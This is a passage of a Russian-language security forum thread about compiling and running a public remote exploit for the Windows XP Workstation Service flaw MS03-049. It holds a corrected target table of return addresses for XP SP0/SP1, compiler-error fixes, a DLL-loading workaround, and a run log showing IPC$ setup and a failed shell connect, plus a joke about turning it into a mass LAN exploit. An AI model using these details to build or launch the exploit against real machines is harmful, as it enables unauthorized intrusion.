Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1 2 3 4 5 ... 11 След.
RSS
Microsoft Windows XP Workstation Service Remote Exploit (MS03-049)
 
Обсуждение статьи Microsoft Windows XP Workstation Service Remote Exploit (MS03-049)
 

Как его компилировать?

 
Смею предположить, что руками [IMG]http://www.securitylab.ru/forum/smileys/smiley2.gif[/IMG]

PS: а вообще голова, приложенная в нужном месте, способна перевернуть мир [IMG]http://www.securitylab.ru/forum/smileys/smiley10.gif[/IMG]
 
Цитата
f0xi пишет:

Как его компилировать?

если ты имеешь ввиду компилятор, то я юзаю lcc_win32, а ты можешь например МС [IMG]http://www.securitylab.ru/forum/smileys/smiley2.gif[/IMG] + немного подредактировав

и еще по ошибочке на vuln@security.nnov.ru
была отослана не та версия (hi ЗАРАЗА, acl?)
хотя функциональности это его не лишает
исправляем:
targets[] = {
     { "Window XP + SP0 [All]              ", 0x77f77343 },
     { "Window XP + SP0 + Rollup [All]   ", 0x77f98db7 },
     { "Window XP + SP1 [All]              ", 0x77fb59cc },
     { "Window XP + SP1 + Rollup [All]   ", 0x77f9980f },
     { "Crash  all         &nb sp;      ", 0x41424344 }
}, tgt_type;   

Привет Polax Troy
 
Упрямо не хочет компилироваться :(((
Под VC++ 6
Compiling...
ms0349.cpp
c:\ms0349\ms0349.cpp(251) : error C2065: 'snprintf' : undeclared identifier
c:\ms0349\ms0349.cpp(292) : error C2065: 'beginthread' : undeclared identifier
c:\ms0349\ms0349.cpp(295) : error C2065: 'sleep' : undeclared identifier
Error executing cl.exe.

ms0349.exe - 3 error(s), 0 warning(s)

Не могли бы вы поподробнее расписать сам процесс?
Не слишком важно под какой компилятор. lcc_win32 тоже стоит, но там пишет:
Error d:\ms0349lcc\ms0349lcc.c 233 undefined reference to _NetAddAlternateComputerName
Error d:\ms0349lcc\ms0349lcc.c 255 undefined reference to _optarg
Error d:\ms0349lcc\ms0349.c 251 undefined reference to _getopt
 
Ну у меня положим lcc компильнул все, но стопорнулся на функции: _NetAddAlternateComputerName , где взять исходник с ней я не нашел. Откуда это добро?
КОнечно можно ее закоментить и все компильнется :) Но последствия я не знаю :)

Error d:\ms0349lcc\ms0349lcc.c 255 undefined reference to _optarg
Error d:\ms0349lcc\ms0349.c 251 undefined reference to _getopt

А вот это лечится просто добавлением в проект файлов из состава nc.
 
2undefined
а ты закоментируй - получится масс эксплоит (вся локалка твоя) [IMG]http://www.securitylab.ru/forum/smileys/smiley2.gif[/IMG]
 
Цитата
Undefined пишет:
Ну у меня положим lcc компильнул все, но стопорнулся на функции: _NetAddAlternateComputerName , где взять исходник с ней я не нашел. Откуда это добро?
экспорт из netapi32.dll
по крайней мере на WinXP присутствует ;)
 
fiNis, чето даже после экспорта в новую библиотечку все равно пишет анресолвед......

Сделал прямую загрузку из длл:
hLibHandle = LoadLibrary("winapi32.dll");
pfnNAACN = (PFN_NAACN) GetProcAddress(hLibHandle, "NetAddAlternateComputerName");
(*pfnNAACN)(tgt_net_uni, expl_uni ,NULL,NULL,0);

скомпилялась, но не пашет :(


Проверил на 3-х rus XPSP1. Не может сконнектится на 9191 и удаленная машина начинает глючить....

Намекни чего нить, плззз!
 
a gde vzat' pedump нормальный?? а то я загрузил пару штук,а они грят, что /exp - неверный ключ... а откомпиленой версии случаем нет?
 
качай последний lccwin32 от 26 ноября, проверено :)
 
А может сделать эту штуку на Delphi? С нормальным интерфейсом и т.д.? Если будут желающие, могу потрудится на благо народа :-)
 
дану его этот интерфейс, консоль рулит!

fiNis, отзовись
 
ну потрудись, коли тебе не трудно ;)
 
У меня вот такой геморр в VC.NET:
exploit2 error LNK2019: unresolved external symbol _sleep referenced in function _main
exploit2 error LNK2019: unresolved external symbol _beginthread referenced in function _main
exploit2 error LNK2019: unresolved external symbol _snprintf referenced in function _main
exploit2 error LNK2001: unresolved external symbol _optarg
exploit2 error LNK2019: unresolved external symbol _getopt referenced in function _main


Че делать?
 
ждем совета fiNisa, потому как откомпиленная тоже чего то не дает шелла.
 
2-skin-
тута я [IMG]http://www.securitylab.ru/forum/smileys/smiley2.gif[/IMG]
отвечу только на толковые вопросы.
с попросами типа: а посему у меня не копилится к соему препу информатики  [IMG]http://www.securitylab.ru/forum/smileys/smiley7.gif[/IMG]
 
Я понял! Это фейк! ))
 
fiNis, так вот я же говорю, откомпилилась!

три машины под рукой, но везде одно и тоже выдает.
Компы rus XPSP1, порты 135,139 открыты, без патчей.

ms0349.exe -h 10.10.xx.xx -t3

[+] Prepare exploit string
[+] Sleep at 2s ...
[+] Setting up IPC$ session...
[*] IPC$ session setup successfully!
[+] Sending exploit ...
[+] Initialize WSAStartup - OK
[*] Socket initialized - OK
[+] Try connecting to 10.10.xx.xx:9191 ...

[x] Exploit failed or is Filtred. Exiting...

И удаленный комп начинает глючить :)

Выручай!
 
Error c:\documents and settings\vlad\Рабочий стол\new update\new\rpc_wks_bo.c 223 undefined reference to _NetAddAlternateComputerName
Error c:\documents and settings\vlad\Рабочий стол\new update\new\rpc_wks_bo.c 245 undefined reference to _optarg
Error c:\documents and settings\vlad\Рабочий стол\new update\new\rpc_wks_bo.c 241 undefined reference to _getopt
search
Compilation + link time:0.1 sec, Return code: 6


в чем дело то ?
Страницы: 1 2 3 4 5 ... 11 След.
Читают тему